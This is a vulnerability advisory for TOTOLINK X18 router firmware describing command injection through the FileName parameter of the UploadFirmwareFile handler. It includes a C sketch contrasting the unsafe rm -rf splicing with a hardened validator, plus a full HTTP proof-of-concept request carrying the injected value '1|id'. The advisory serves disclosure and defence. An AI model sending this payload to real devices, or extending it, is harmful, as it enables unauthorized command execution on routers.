Firmware

TOTOLINK: X18 V9.1.0cu.2024_B20220329

TOTOLINK: X18 V9.1.0cu.2021_B20220326

https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/226/ids/36.html


Details

The FileName parameter of the UploadFirmwareFile handler in cstecgi.cgi is attacker-controllable, and the input FileName value is not validated. When any error is triggered during the upload, the FileName value is spliced into an "rm -rf" command string and executed, which results in command injection.


CsteSystem comes from /usr/lib/libcscommon.so. Analysis shows that the command string is ultimately executed by invoking /bin/bash through execv.
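As an added illustration (not the vendor's code), the string-splicing pattern described above, reconstructed to only build the command string, placed beside a hardened cleanup that validates FileName and removes the upload without involving a shell. The /tmp/ upload directory and the function names are assumptions.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Vulnerable pattern as described in the advisory, reconstructed for
 * illustration: the untrusted FileName is spliced into a shell command
 * string that the firmware later hands to /bin/bash via execv. A value
 * such as "1|id" yields "rm -rf /tmp/1|id", which bash parses as two
 * commands. Returns a static buffer; only builds the string, never runs it. */
static const char *build_cleanup_cmd_unsafe(const char *filename) {
    static char cmd[256];
    int n = snprintf(cmd, sizeof cmd, "rm -rf /tmp/%s", filename);
    return (n > 0 && (size_t)n < sizeof cmd) ? cmd : NULL;
}

/* Hardened check: accept only [A-Za-z0-9._-], no leading dot, bounded
 * length. Rejects shell metacharacters ('|', ';', '`', '$', ' ') and
 * path traversal ("../") before the name reaches any command. */
static int is_safe_firmware_name(const char *name) {
    size_t len = strlen(name);
    if (len == 0 || len > 64 || name[0] == '.') return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!isalnum(c) && c != '.' && c != '_' && c != '-') return 0;
    }
    return 1;
}

/* Hardened cleanup: validate, build a fixed-prefix path, and remove the
 * file with unlink(). No shell is involved, so the name is a plain path
 * argument and cannot be reinterpreted as command syntax. Returns the
 * path removed (static buffer) or NULL if the name was rejected. */
static const char *cleanup_upload_safe(const char *filename) {
    static char path[256];
    if (!is_safe_firmware_name(filename)) return NULL;
    int n = snprintf(path, sizeof path, "/tmp/%s", filename);
    if (n <= 0 || (size_t)n >= sizeof path) return NULL;
    if (unlink(path) != 0 && errno != ENOENT) return NULL; /* missing file is fine */
    return path;
}

int main(void) {
    printf("unsafe command: %s\n", build_cleanup_cmd_unsafe("1|id"));
    printf("safe, \"1|id\": %s\n", cleanup_upload_safe("1|id") ? "accepted" : "rejected");
    printf("safe, \"fw_x18_v9.bin\": %s\n", cleanup_upload_safe("fw_x18_v9.bin") ? "accepted" : "rejected");
    return 0;
}
```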


PoC:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.109.161
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Origin: http://192.168.109.161
Connection: close
Referer: http://192.168.109.161/basic/mesh.html?timestamp=1667781517612
Cookie: SESSION_ID=2:1667781512:2

{"FileName": "1|id","ContentLength":"11","topicurl":"UploadFirmwareFile"}

Test screenshot:
